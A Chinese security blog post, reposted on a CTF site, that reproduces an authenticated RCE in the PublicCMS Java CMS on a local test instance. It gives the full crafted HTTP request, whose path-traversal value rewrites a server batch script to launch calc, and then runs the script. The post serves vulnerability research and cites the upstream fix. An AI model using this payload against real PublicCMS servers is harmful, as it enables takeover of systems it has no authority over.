CTF导航 CTF导航

JAVA PublicCMS后台RCE漏洞复现

渗透技巧 6个月前 admin
39 0 0

复现大佬审计的javaCMS漏洞

环境下载

https://github.com/sanluan/PublicCMS

最新版本的漏洞修复了,将CmsFileUtils文件中的代码,修改为漏洞修复前代码

publiccms-parent/publiccms-core/src/main/java/com/publiccms/common/tools/CmsFileUtils.java

File file = Paths.get(dirPath, result.getPath()).toFile(); //修复前
//File file = Paths.get(dirPath, CmsFileUtils.getSafeFileName(result.getPath())).toFile();  //修复后

JAVA PublicCMS后台RCE漏洞复现

环境搭建

jdk1.8
idea2020
mysql

下载代码后,将代码用idea载入即可,要手动载入junit包

JAVA PublicCMS后台RCE漏洞复现

JAVA PublicCMS后台RCE漏洞复现

working directory配置项

设置到publiccms-parentpubliccms

JAVA PublicCMS后台RCE漏洞复现

配置后环境后,直接启动,然后进行安装程序

JAVA PublicCMS后台RCE漏洞复现

登录后台

JAVA PublicCMS后台RCE漏洞复现

漏洞复现

有一个执行脚本的功能点,脚本可选择bat或sh(用于Windows和Linux两个操作系统上)

JAVA PublicCMS后台RCE漏洞复现


构造数据包修改脚本文件内容

POST /admin/cmsTemplate/replace?navTabId=cmsTemplate/list HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua-mobile: ?0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
sec-ch-ua-platform: "Windows"
Cookie: JSESSIONID=95329D5E39F69B69F0A291CC119EE56F; PUBLICCMS_ADMIN=1_2b46f00d-3f68-4479-a831-35be6a8fd772
Origin: http://127.0.0.1:8080
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Referer: http://127.0.0.1:8080/admin/
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
sec-ch-ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 72

_csrf=2b46f00d-3f68-4479-a831-35be6a8fd772&word=echo "repo not config!"&replace=echo "repo not config!" & start calc&replaceList[0].path=../../script/sync.bat&replaceList[0].indexs=0

将 sync.bat 文件中写入 start calc

JAVA PublicCMS后台RCE漏洞复现

接着在执行脚本的功能点,执行文件

JAVA PublicCMS后台RCE漏洞复现

漏洞利用成功

JAVA PublicCMS后台RCE漏洞复现

漏洞分析文章

https://forum.butian.net/share/2490
https://github.com/sanluan/PublicCMS/commit/c878442ec4dc77203c780c8a39bb5e7af47cf73b



原文始发于微信公众号(安全逐梦人):JAVA PublicCMS后台RCE漏洞复现

版权声明:admin 发表于 2023年10月30日 下午9:10。
转载请注明:JAVA PublicCMS后台RCE漏洞复现 | CTF导航

相关文章

针对Python 3.9修改pycdc源码示例
admin
663
N先知安全沙龙(西安站) – 浅谈XSS漏洞挖掘与构造思路
admin
84
利用JVMTI实现JAR包加密
admin
735
「免杀对抗」怎样实现一个基础的shellcodeloader
admin
63
XSS bypass WAF
admin
515
CVE-2023-33829 SCM Manager XSS漏洞复现
admin
251

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0
How Did I Easily Find Stored XSS at Apple And Earn $5000 ?
0
How I Discovered an RCE Vulnerability in Tesla, Securing a $10,000 Bounty
0
pgAdmin 8.3 Remote Code Execution
0
How I Prevented a Mass Data Breach – $15,000 bounty – @bxmbn
0
The Windows Registry Adventure #1: Introduction and research results
0
使用 VIM 进行代码审计
0
Progress Flowmon 任意命令执行漏洞 CVE-2024-2389
0